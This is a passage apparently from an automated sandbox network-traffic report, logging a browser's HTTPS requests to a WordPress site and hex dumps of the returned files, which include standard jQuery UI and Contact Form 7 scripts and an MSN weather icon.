                                                                                                          2024-12-12 11:58:26 UTC16384INData Raw: 91 ea e4 b7 72 e2 8f 0c d1 c6 d2 4e 5d af 63 cb 33 cc 42 9b 02 44 92 66 10 f0 24 ca c1 92 08 3b ea f1 c1 34 36 75 e5 6f ad 07 67 96 5a d7 be 56 33 40 44 90 20 b0 40 04 6a 9f e3 64 c9 81 0e 11 34 b4 ee ac d4 a9 79 9c d7 f7 de 4b b2 40 09 02 8e 71 c8 31 08 04 81 cd 23 60 df 77 07 fd e4 db 62 ec 57 1d 87 98 87 3d 9b d5 3d ec 33 9d a3 3a 79 cc 9a 58 8a c0 08 f5 02 81 ba ad fe b5 24 46 4f bc 18 66 56 3a 43 b9 ff a7 dc 8b bc 17 dd e0 07 79 4c a2 6c 68 46 08 f0 cc 8d f3 f1 ca f3 0c 88 59 74 1d 5f 9b 57 fb 61 e1 19 14 ff 74 8c 43 4b 47 da 9a 6d 8c ff 21 b9 1e 5b cc b2 8d 4c 5b 76 36 a4 4c d6 92 56 da ef 7b eb e7 f8 45 3c 07 fc 3d db 97 be 3c ff f5 da 0f 75 b0 0f cb a6 94 bb 8b a1 2c e2 1b e3 90 e3 fc 11 a8 fb bf 67 ea f6 6e bf 8b 8e 25 59 8e 3a 45 26 9f b3 a1 f4
                                                                                                          Data Ascii: rN]c3BDf$;46uogZV3@D @jd4yK@q1#`wbW==3:yX$FOfV:CyLlhFYt_WatCKGm![L[v6LV{E<=<u,gn%Y:E&
                                                                                                          2024-12-12 11:58:26 UTC16384INData Raw: 20 08 04 81 20 b0 31 02 ad 0f 1e 37 ae 41 be d1 15 02 0c 2e bc c0 e4 f1 ca 6f 2f ae 27 41 a7 b9 8f 07 2e ff a2 42 be 26 e6 5f 02 58 74 ee cd 29 4c b4 6e 76 10 a4 af 2e 8c d0 17 e4 86 9e 20 26 90 41 d0 8c 34 14 04 82 c0 f4 08 f0 26 7b ec c1 f7 c4 47 97 e2 58 44 ec b7 6b 96 4b bd 4f 6c 33 9e ad 9a 3c 49 4c 60 88 37 f9 87 82 40 10 08 02 b3 44 c0 0b 65 2f d5 4d 1e 23 c6 cf f3 26 39 7c b5 21 4c ce e0 ab d9 ef 3c 54 f9 e7 89 21 fa 11 db de d1 85 1c 82 40 10 08 02 41 60 22 04 e8 2f b0 a5 f7 10 df af fc 92 b1 b0 6d 6e b9 34 71 c2 82 01 fc fd f3 c4 1f a8 7e cd e6 14 36 a8 f7 89 c0 08 62 e3 e7 ed 46 b9 61 f4 ad a5 2a 49 82 40 10 98 23 02 5e a0 f7 63 dd f3 b4 72 df 3e f9 ea f8 dd 8e 31 3f 4e 79 de aa 4a 3c 35 9b c4 05 42 68 6a 04 ac 1f 6e 5b 14 d8 c5 1c 17 e3 65 cf
                                                                                                          Data Ascii: 17A.o/'A.B&_Xt)Lnv. &A4&{GXDkKOl3<IL`7@De/M#&9|!L<T!@A`"/mn4q~6bFa*I@#^cr>1?NyJ<5Bhjn[e
                                                                                                          2024-12-12 11:58:26 UTC16384INData Raw: fc 69 1f ef 5d d7 69 3d 7e c0 bd 73 49 95 c5 f1 91 da cd 26 04 42 20 04 42 20 04 42 20 04 42 20 04 42 20 04 42 60 c8 04 3c 39 6a c8 36 c6 b6 1d 13 20 48 85 1c 28 65 02 31 e2 20 d6 74 6f 73 af 4c 0e 44 2e 92 be 6f 92 fa e5 44 ba da 1d cc c6 f7 30 ff 90 e2 a7 65 78 20 6a 30 46 6e c7 10 ec f6 e0 2f 83 a9 b7 ac fd 0c a8 6e 07 56 0e 85 c0 0a 09 e0 53 3d 48 fe 02 a5 cf 94 f2 3b e5 e9 55 63 10 97 ed 9a 2a 0c 8b 52 ae 2f 3d 57 7a 5d 29 41 5f 3f c1 52 c9 48 08 84 40 08 f4 4e 80 c1 56 fb d9 17 29 fd d2 ba 02 be 69 4c 83 4d 0c 02 ba 7d fa 4a a5 6f 2b a5 1e c9 a2 14 41 88 84 40 08 2c 84 00 7e 94 7e 3d ed d6 63 ea 0a 7d 4c 48 c0 6f db 77 9d 5a f9 0e 75 43 f9 69 cb 7e 4d fa 26 29 c2 22 9d 16 26 fa 10 eb a1 7e bc 87 94 85 8c 08 76 f3 bd 46 42 20 04 42 60 b3 04 58 9c 77
                                                                                                          Data Ascii: i]i=~sI&B B B B B B`<9j6 H(e1 tosLD.oD0ex j0Fn/nVS=H;Uc*R/=Wz])A_?RH@NV)iLM}Jo+A@,~~=c}LHowZuCi~M&)"&~vFB B`Xw


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          69192.168.2.2449852147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:25 UTC624OUTGET /wp-includes/js/jquery/ui/effect.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:25 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:25 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 10332
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:25 UTC10332INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22
                                                                                                          Data Ascii: /*! * jQuery UI Effects 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(t){"use strict";"function"==typeof define&&define.amd?define(["


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          70192.168.2.2449853147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:25 UTC630OUTGET /wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:25 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:25 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 917
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:25 UTC917INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 53 6c 69 64 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66
                                                                                                          Data Ascii: /*! * jQuery UI Effects Slide 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?def


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          71192.168.2.2449858147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:25 UTC634OUTGET /wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:25 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:25 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 648
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:25 UTC648INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 48 69 67 68 6c 69 67 68 74 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64
                                                                                                          Data Ascii: /*! * jQuery UI Effects Highlight 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          72192.168.2.2449860147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:25 UTC629OUTGET /wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:26 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:25 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1020
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:26 UTC1020INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 46 6f 6c 64 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69
                                                                                                          Data Ascii: /*! * jQuery UI Effects Fold 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?defi


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          73192.168.2.244986295.100.135.130443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:26 UTC325OUTGET /weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehwh2.png HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-CH,en-US;q=0.7,en;q=0.3
                                                                                                          UA-CPU: AMD64
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Host: assets.msn.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-12 11:58:27 UTC1059INHTTP/1.1 200 OK
                                                                                                          Content-Type: image/png
                                                                                                          Last-Modified: Wed, 04 Sep 2024 02:01:27 GMT
                                                                                                          ETag: 0x8DCCC857CF33929
                                                                                                          Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                          x-ms-request-id: be34abf0-e01e-004b-6ea6-fedaa6000000
                                                                                                          x-ms-version: 2009-09-19
                                                                                                          x-ms-lease-status: unlocked
                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Expires: Tue, 24 Dec 2024 08:44:02 GMT
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Content-Length: 2118
                                                                                                          Connection: close
                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                          Akamai-Request-BC: [a=95.100.135.116,b=18656986,c=g,n=DE_HE_FRANKFURT,o=20940]
                                                                                                          Server-Timing: clientrtt; dur=86, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                          Akamai-Cache-Status: Hit from child
                                                                                                          Akamai-Server-IP: 95.100.135.116
                                                                                                          Akamai-Request-ID: 11caeda
                                                                                                          Cache-Control: public, max-age=2592000
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Akamai-GRN: 0.7487645f.1734004707.11caeda
                                                                                                          Vary: Origin
                                                                                                          2024-12-12 11:58:27 UTC2118INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 48 08 06 00 00 00 55 ed b3 47 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 07 f0 49 44 41 54 78 9c ed 5b 7b 8c 54 d5 19 ff 7d 67 66 57 5e cb ee b0 68 c8 02 66 55 82 ee 16 d4 62 81 60 dd 5a 2b ae af 86 6a 1b c5 a4 a9 76 63 d5 56 0d 09 d6 d2 47 2c 5d db 46 31 58 93 46 b3 51 8c 34 5a 05 a3 7d 40 5c 56 50 ab 4d 43 6c 9a a6 95 18 89 0d d9 55 8a 2d 52 64 67 58 58 d8 d9 9d b9 e7 d7 3f 76 1e f7 ce 7d ce 9d 99 65 6f b2 5f f2 65 e6 3c 7e df 77 ce 6f be f3 bc 77 80 29 99 92 29 a9 a1 c8 99 6e 40 58 49 f7 5e 77 6d 3c 86 35 02 7c 72 9a f2 5c c3 0d af 7f 56 0b 3f 91 24 68 b4 ef fa 76 a1 b1 0d 30 75 40 64 7b 5c e1 59 b9 6e 4f b2 9a be 54 35 8d 4d 98 30 d3
                                                                                                          Data Ascii: PNGIHDRHHUGsRGBsBIT|dIDATx[{T}gfW^hfUb`Z+jvcVG,]F1XFQ4Z}@\VPMClU-RdgXX?v}eo_e<~wow))n@XI^wm<5|r\V?$hv0u@d{\YnOT5M0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          74192.168.2.2449863147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC630OUTGET /wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 880
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:27 UTC880INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 42 6c 69 6e 64 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66
                                                                                                          Data Ascii: /*! * jQuery UI Effects Blind 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?def


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          75192.168.2.2449865147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC466OUTGET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.6 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Thu, 04 Jul 2024 23:27:33 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 11513
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:27 UTC11513INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 69 29 3d 3e 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 29 74 2e 6f 28 69 2c 73 29 26 26 21 74 2e 6f 28 65 2c 73 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 69 5b 73 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 53
                                                                                                          Data Ascii: (()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,S


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          76192.168.2.2449864147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC654OUTGET /wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=6.7.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 10 May 2024 09:02:59 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2914
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
